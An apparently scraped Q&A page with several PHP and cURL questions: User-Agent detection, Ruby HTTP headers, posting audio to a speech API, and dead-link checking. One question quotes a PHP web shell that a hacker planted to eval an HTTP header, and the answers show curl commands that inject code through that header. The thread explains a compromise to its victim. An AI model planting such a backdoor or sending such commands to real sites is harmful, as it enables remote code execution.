Detect in PHP if page is accessed with cURL or Wget - php

I have a simple PHP script which shows some information to a user. I want to shorten this information as muss as possible if the same page is requested with cURL or saved with Wget.
I saw several similar question on Stackoverflow, but they have some extras like “I want to block cURL” or “redirect a form request if…”. The answers usually tell that it is not possible to detect a cURL request reliably, since cURL lets the user change all request parameters and pretend to be a browser. Thats okay for me, I dont want to block cURL, I want to offer an extra service for a generic cURL (and Wget) request.

If not configured otherwise cURL and Wget use a custom »User Agent« string for their requests.
For example curl/7.47.0 or Wget/1.17.1 (linux-gnu). You can test this easiliy on https://requestb.in.
Several applications may access the User Agent string in the request header. In PHP its available in the $_SERVER['HTTP_USER_AGENT'] variable.
So to detect a cURL or Wget request and offer different content, you may use
<?php
// Catch cURL/Wget requests
if (isset($_SERVER['HTTP_USER_AGENT']) && preg_match('/^(curl|wget)/i', $_SERVER['HTTP_USER_AGENT'])) {
echo 'Hi curl user!';
}
else {
echo 'Hello browser user!';
}
?>
In my app I detect the cURL request and then let the process die() in the if loop. So if its just a browser, the the condition doesnt match and executes all the following PHP code.
As said before, both cURL and Wget allow the user to set an arbitrary User Agent. But for the requested service, this solution is sufficient.

Related

Can a hacker pass in parameters to $_SERVER?

So our website unfortunately got hacked.
They created a file in our wp-admin directory called wp-update.php containing this code:
<?php #eval($_SERVER['HTTP_4CD44849DA572F7C']); ?>
My question is how can the hacker pass in his script using $_SERVER?
Yes a hacker can send data into $_SERVER, it contains HTTP headers (cf. the documentation) with a simple curl command you can inject data.
curl -H '4CD44849DA572F7C: echo "hello from server";' http://example.com
Properties of the $_SERVER superglobal with names starting with HTTP_ are just representations of the HTTP request headers.
Since request headers are completely under the control of whoever is making the request, it is trivial to insert data there.
Any HTTP client will let the attacker specify whatever headers they like. An example in cURL's command line client would look like:
curl -H "4CD44849DA572F7C: code goes here" http://example.com/your-hacked.php

Callback function

So in JavaScript, I used to be able to have an http request initiate a callback when AJAX sent a response back to some data I sent to the server, successfully being a callback function. I'm now experimenting with the OAuth2 gem for Ruby, and I'm finding callbacks to not be the same;
I have a web server and facebook app set up, and I have a small php script that writes the current URL (including the auth code, for example) to a file, no problem. All the settings in the facebook app are set up, and if I put this in the URL in the browser:
http://graph.facebook.com/oauth/authorize?client_id=[my_client_id]&redirect_uri=http://localhost/oauth/callback/index.php
It redirects successfully to that script, which then writes the authorization code to a file which I can then use to get the access token. Problem is that I can only do this process manually; using the Net::HTTP.get(URI(address)) command in ruby doesn't seem to initiate the php script.
Ayone have any ideas?
I have no idea why you posted your history with javascript ajax requests, as it has no bearing on your ruby script, which by the way doesn't even use a callback method/function. Using a callback function just means you are calling some function and passing it another function as an argument. When I started programming, the term callback function was very confusing to me, and in my opinion the term should be dropped from the lingo.
As for your ruby script, you need to use something like Firebug to look at the request headers that are being sent by your browser to the server when you manually enter the url in your browser. If you use those same headers in your ruby script, then it should work, e.g.:
req['header1'] = 'hello'
req['header2'] = '10'
or:
headers = {
'header1' => 'hello',
'header2' => '10',
...
}
req = Net::HTTP::Get.new(uri.request_uri, headers)
http = Net::HTTP.new(uri.host, uri.port)
resp = http.request(req)
It's possible that you have a cookie set in your browser, which your browser automatically adds to the request headers when it sends the request to the server. Your browser probably adds thousands of headers to the request--many of which will have no bearing on your problem. If you have the patience, you can try to figure out which header is causing your ruby script's request to malfunction.
Another option is to use the mechanize gem, which will automatically handle cookies and redirects for requests sent by ruby scripts:
http://docs.seattlerb.org/mechanize/GUIDE_rdoc.html
(Read the section Let's Fetch a Page; Don't use the line require 'rubygems' if you are using ruby 1.9+).

Posting FLAC to Google Voice Recognition API from PHP

I am quite experienced in PHP but I've always had troubles with connection between servers like "post". I have a FLAC audio file that I need to post to Google's Speech Recognition API server. I don't know neither how to "listen" to its response. I would like a script like that, assuming that this kind of function exists :
<?php
$fileId = $_GET['fileId'];
$filepath = $fileId . ".flac";
recognize($filepath);
function recognize($pathToFile) {
//It's the following function that I'm looking for
$response = $pathToFile->post("http://www.google.com/speech-api/v1/.....&client=chromium");
//The $response would be the short JSON that Google feed back.
echo $response;
}
?>
EDIT
I've followed a tutorial to create a Shell Script that posts my FLAC file using Wget --post. I would like to post like this, but in PHP. Also, at the end of the command, there is this > answer.ret line, so that Google's answer would be written to this file. I was wondering if there was an alternate method to it in PHP.
Here's the command line :
wget -q -U "Mozilla/5.0" --post-file audio1.flac --header="Content-Type: audio/x-flac; rate=16000" -O - "http://www.google.com/speech-api/v1/recognize?lang=fr-fr&client=chromium" > trancription1.ret
EDIT 2
I figured out how to do it, with #hakre 's answer and baked up a little Gist for curious people. Here it is: https://gist.github.com/chlkbumper/4969389. Don't forget that the FLAC file must be a 16k bitrate FLAC
A POST request is just a standard HTTP request, just with the POST method specified. The rest of the HTTP Request and HTTP Response is pretty much the same.
You get the response of a request in form of a HTTP Response btw.. It is absolutely normaltiv defined in RFC 2616 - just relate to this document and it explains everything.
A function in PHP to send HTTP requests is file_get_contents, it returns the requests response. This is done via the HTTP stream wrapper that offers some options you need to send a POST request (default is GET). See HTTP context options.
Another popular PHP extension for sending HTTP requests are the Curl bindings.

check if page is viewed in browser? PHP

I was wondering if there is any way to check a page has been ran in a browser (by a human) in PHP.
I've got a page that only needs to be accessed through a cURL request. So I don't want users snooping around on it.
any ideas?
thanks
EDIT:
Because this is one of those questions that are not easily found on the web, here's the solution i used:
I came up with an idea thanks to anthony-arnold. Its not very stable, but it should do for now.
I simply sent the user agent in my cURL request:
//made a new var with the user agent string.
$user_agent = "anything I want in here, which will be my user agent";
//added this line in the cURL request to send the useragent to the target page:
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
and then I simply wrote an if statement to handle it:
if
($_SERVER['HTTP_USER_AGENT'] == "my expected useragent - the string i previously placed into the $user_agent var."){
echo "the useragent is as expected, do whatever";
}
else if
($_SERVER['HTTP_USER_AGENT'] != "my expected useragent - the string i previously placed into the $user_agent var."){
echo "useragent is not as expected, bye now."; exit();}
And that did the trick.
Check the User-Agent or use the get browser function to check which browser is requesting your page. You could configure your web server to fail unless a specific user agent is specified. You can set the user agent in cURL using the --user-agent switch (see the man page).
Unfortunately, the user agent can be spoofed so you can never be absolutely sure that the one sent by the client is in fact correct.
There is a problem with this idea though. If it's on the public web, you have to expect that people might try to access it in any way! If the HTTP request is valid, your server will respond to it (under default configuration). If you really don't want it accessed by any method other than your prescribed cURL one, then you might need to invest in some further authentication/authorization methods (e.g. username/passphrase authentication via SSL).

How do I check for valid (not dead) links programmatically using PHP?

Given a list of urls, I would like to check that each url:
Returns a 200 OK status code
Returns a response within X amount of time
The end goal is a system that is capable of flagging urls as potentially broken so that an administrator can review them.
The script will be written in PHP and will most likely run on a daily basis via cron.
The script will be processing approximately 1000 urls at a go.
Question has two parts:
Are there any bigtime gotchas with an operation like this, what issues have you run into?
What is the best method for checking the status of a url in PHP considering both accuracy and performance?
Use the PHP cURL extension. Unlike fopen() it can also make HTTP HEAD requests which are sufficient to check the availability of a URL and save you a ton of bandwith as you don't have to download the entire body of the page to check.
As a starting point you could use some function like this:
function is_available($url, $timeout = 30) {
$ch = curl_init(); // get cURL handle
// set cURL options
$opts = array(CURLOPT_RETURNTRANSFER => true, // do not output to browser
CURLOPT_URL => $url, // set URL
CURLOPT_NOBODY => true, // do a HEAD request only
CURLOPT_TIMEOUT => $timeout); // set timeout
curl_setopt_array($ch, $opts);
curl_exec($ch); // do it!
$retval = curl_getinfo($ch, CURLINFO_HTTP_CODE) == 200; // check if HTTP OK
curl_close($ch); // close handle
return $retval;
}
However, there's a ton of possible optimizations: You might want to re-use the cURL instance and, if checking more than one URL per host, even re-use the connection.
Oh, and this code does check strictly for HTTP response code 200. It does not follow redirects (302) -- but there also is a cURL-option for that.
Look into cURL. There's a library for PHP.
There's also an executable version of cURL so you could even write the script in bash.
I actually wrote something in PHP that does this over a database of 5k+ URLs. I used the PEAR class HTTP_Request, which has a method called getResponseCode(). I just iterate over the URLs, passing them to getResponseCode and evaluate the response.
However, it doesn't work for FTP addresses, URLs that don't begin with http or https (unconfirmed, but I believe it's the case), and sites with invalid security certificates (a 0 is not found). Also, a 0 is returned for server-not-found (there's no status code for that).
And it's probably easier than cURL as you include a few files and use a single function to get an integer code back.
fopen() supports http URI.
If you need more flexibility (such as timeout), look into the cURL extension.
Seems like it might be a job for curl.
If you're not stuck on PHP Perl's LWP might be an answer too.
You should also be aware of URLs returning 301 or 302 HTTP responses which redirect to another page. Generally this doesn't mean the link is invalid. For example, http://amazon.com returns 301 and redirects to http://www.amazon.com/.
Just returning a 200 response is not enough; many valid links will continue to return "200" after they change into porn / gambling portals when the former owner fails to renew.
Domain squatters typically ensure that every URL in their domains returns 200.
One potential problem you will undoubtably run into is when the box this script is running on looses access to the Internet... you'll get 1000 false positives.
It would probably be better for your script to keep some type of history and only report a failure after 5 days of failure.
Also, the script should be self-checking in some way (like checking a known good web site [google?]) before continuing with the standard checks.
You only need a bash script to do this. Please check my answer on a similar post here. It is a one-liner that reuses HTTP connections to dramatically improve speed, retries n times for temporary errors and follows redirects.

Categories